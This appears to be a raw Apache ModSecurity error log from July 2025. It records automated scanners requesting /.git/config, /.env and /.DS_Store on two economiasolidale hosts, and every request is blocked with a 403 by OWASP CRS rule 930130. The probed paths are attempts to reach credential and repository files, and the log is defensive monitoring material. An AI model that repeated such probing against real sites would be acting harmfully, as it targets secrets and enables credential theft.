[Tue Jul 15 19:37:45.017656 2025] [:error] [pid 1209533] [client 195.178.110.68:59724] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHaR6WF8p5vH8U3onPGaPwAAAA0"]
[Tue Jul 15 19:37:45.017845 2025] [:error] [pid 1209533] [client 195.178.110.68:59724] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHaR6WF8p5vH8U3onPGaPwAAAA0"]
[Tue Jul 15 22:26:29.087885 2025] [:error] [pid 1209532] [client 195.178.110.68:56389] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHa5dRQwzbXG4mZXvQUv1AAAAAo"]
[Tue Jul 15 22:26:29.088150 2025] [:error] [pid 1209532] [client 195.178.110.68:56389] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHa5dRQwzbXG4mZXvQUv1AAAAAo"]
[Tue Jul 15 22:26:29.088319 2025] [:error] [pid 1209532] [client 195.178.110.68:56389] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHa5dRQwzbXG4mZXvQUv1AAAAAo"]
[Wed Jul 16 11:58:42.623699 2025] [:error] [pid 1217126] [client 198.55.98.91:39746] [client 198.55.98.91] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHd30hruhn_mMJeuAw__cgAAAAY"]
[Wed Jul 16 11:58:42.623953 2025] [:error] [pid 1217126] [client 198.55.98.91:39746] [client 198.55.98.91] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHd30hruhn_mMJeuAw__cgAAAAY"]
[Wed Jul 16 11:58:42.624121 2025] [:error] [pid 1217126] [client 198.55.98.91:39746] [client 198.55.98.91] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHd30hruhn_mMJeuAw__cgAAAAY"]
[Wed Jul 16 14:52:27.650955 2025] [:error] [pid 1217128] [client 18.206.115.69:37300] [client 18.206.115.69] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHegiynaA1JxylCtwsaInAAAAAc"]
[Wed Jul 16 14:52:27.651255 2025] [:error] [pid 1217128] [client 18.206.115.69:37300] [client 18.206.115.69] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHegiynaA1JxylCtwsaInAAAAAc"]
[Wed Jul 16 14:52:27.651423 2025] [:error] [pid 1217128] [client 18.206.115.69:37300] [client 18.206.115.69] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHegiynaA1JxylCtwsaInAAAAAc"]
[Wed Jul 16 17:37:01.257819 2025] [:error] [pid 1216409] [client 77.90.153.170:33336] [client 77.90.153.170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHfHHQTKHUun_lNNDmy91QAAAAA"]
[Wed Jul 16 17:37:01.258098 2025] [:error] [pid 1216409] [client 77.90.153.170:33336] [client 77.90.153.170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHfHHQTKHUun_lNNDmy91QAAAAA"]
[Wed Jul 16 17:37:01.258275 2025] [:error] [pid 1216409] [client 77.90.153.170:33336] [client 77.90.153.170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHfHHQTKHUun_lNNDmy91QAAAAA"]
[Thu Jul 17 02:51:13.403995 2025] [:error] [pid 1237296] [client 54.242.13.27:33248] [client 54.242.13.27] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHhJAd2ZqNK-2djgg0I1egAAAAI"]
[Thu Jul 17 02:51:13.404414 2025] [:error] [pid 1237296] [client 54.242.13.27:33248] [client 54.242.13.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHhJAd2ZqNK-2djgg0I1egAAAAI"]
[Thu Jul 17 02:51:13.404846 2025] [:error] [pid 1237296] [client 54.242.13.27:33248] [client 54.242.13.27] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHhJAd2ZqNK-2djgg0I1egAAAAI"]
[Thu Jul 17 02:51:13.583833 2025] [:error] [pid 1237295] [client 54.242.13.27:33252] [client 54.242.13.27] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHhJAb3MwEhKxmIb63xIQwAAAAE"]
[Thu Jul 17 02:51:13.584098 2025] [:error] [pid 1237295] [client 54.242.13.27:33252] [client 54.242.13.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHhJAb3MwEhKxmIb63xIQwAAAAE"]
[Thu Jul 17 02:51:13.584257 2025] [:error] [pid 1237295] [client 54.242.13.27:33252] [client 54.242.13.27] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aHhJAb3MwEhKxmIb63xIQwAAAAE"]
[Thu Jul 17 03:46:39.412979 2025] [:error] [pid 1240089] [client 194.26.192.144:60182] [client 194.26.192.144] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHhV_4NSz2JhFMNCIOLH9QAAAAQ"]
[Thu Jul 17 03:46:39.413302 2025] [:error] [pid 1240089] [client 194.26.192.144:60182] [client 194.26.192.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHhV_4NSz2JhFMNCIOLH9QAAAAQ"]
[Thu Jul 17 03:46:39.413491 2025] [:error] [pid 1240089] [client 194.26.192.144:60182] [client 194.26.192.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHhV_4NSz2JhFMNCIOLH9QAAAAQ"]
[Fri Jul 18 19:37:43.934324 2025] [:error] [pid 1283239] [client 195.178.110.68:56214] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqGZ0mWSjTQarEv3tscuQAAAAM"]
[Fri Jul 18 19:37:43.935418 2025] [:error] [pid 1283239] [client 195.178.110.68:56214] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqGZ0mWSjTQarEv3tscuQAAAAM"]
[Fri Jul 18 19:37:43.935628 2025] [:error] [pid 1283239] [client 195.178.110.68:56214] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqGZ0mWSjTQarEv3tscuQAAAAM"]
[Fri Jul 18 19:38:02.774057 2025] [authz_core:error] [pid 1283267] [client 164.90.208.56:46908] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Jul 18 19:38:03.309288 2025] [:error] [pid 1283268] [client 164.90.208.56:46938] [client 164.90.208.56] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aHqGe4dKDZtevH3CtN42IwAAAAk"]
[Fri Jul 18 19:38:03.309524 2025] [:error] [pid 1283268] [client 164.90.208.56:46938] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aHqGe4dKDZtevH3CtN42IwAAAAk"]
[Fri Jul 18 19:38:03.309677 2025] [:error] [pid 1283268] [client 164.90.208.56:46938] [client 164.90.208.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aHqGe4dKDZtevH3CtN42IwAAAAk"]
[Fri Jul 18 19:38:03.406179 2025] [:error] [pid 1283268] [client 164.90.208.56:46940] [client 164.90.208.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHqGe4dKDZtevH3CtN42JAAAAAk"]
[Fri Jul 18 19:38:03.406427 2025] [:error] [pid 1283268] [client 164.90.208.56:46940] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHqGe4dKDZtevH3CtN42JAAAAAk"]
[Fri Jul 18 19:38:03.406590 2025] [:error] [pid 1283268] [client 164.90.208.56:46940] [client 164.90.208.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHqGe4dKDZtevH3CtN42JAAAAAk"]
[Fri Jul 18 19:38:03.502756 2025] [:error] [pid 1283237] [client 164.90.208.56:46942] [client 164.90.208.56] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqGe9NnB30L0FEGiBBMRAAAAAE"]
[Fri Jul 18 19:38:03.503084 2025] [:error] [pid 1283237] [client 164.90.208.56:46942] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqGe9NnB30L0FEGiBBMRAAAAAE"]
[Fri Jul 18 19:38:03.503267 2025] [:error] [pid 1283237] [client 164.90.208.56:46942] [client 164.90.208.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqGe9NnB30L0FEGiBBMRAAAAAE"]
[Fri Jul 18 19:40:19.996088 2025] [:error] [pid 1283276] [client 195.178.110.68:61954] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqHA96WttpDQJ_GVB756QAAAAs"]
[Fri Jul 18 19:40:19.996312 2025] [:error] [pid 1283276] [client 195.178.110.68:61954] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqHA96WttpDQJ_GVB756QAAAAs"]
[Fri Jul 18 19:40:19.996465 2025] [:error] [pid 1283276] [client 195.178.110.68:61954] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqHA96WttpDQJ_GVB756QAAAAs"]
[Fri Jul 18 20:36:22.494077 2025] [:error] [pid 1283239] [client 195.178.110.68:52618] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqUJkmWSjTQarEv3tscwwAAAAM"]
[Fri Jul 18 20:36:22.494367 2025] [:error] [pid 1283239] [client 195.178.110.68:52618] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqUJkmWSjTQarEv3tscwwAAAAM"]
[Fri Jul 18 20:36:22.494552 2025] [:error] [pid 1283239] [client 195.178.110.68:52618] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqUJkmWSjTQarEv3tscwwAAAAM"]
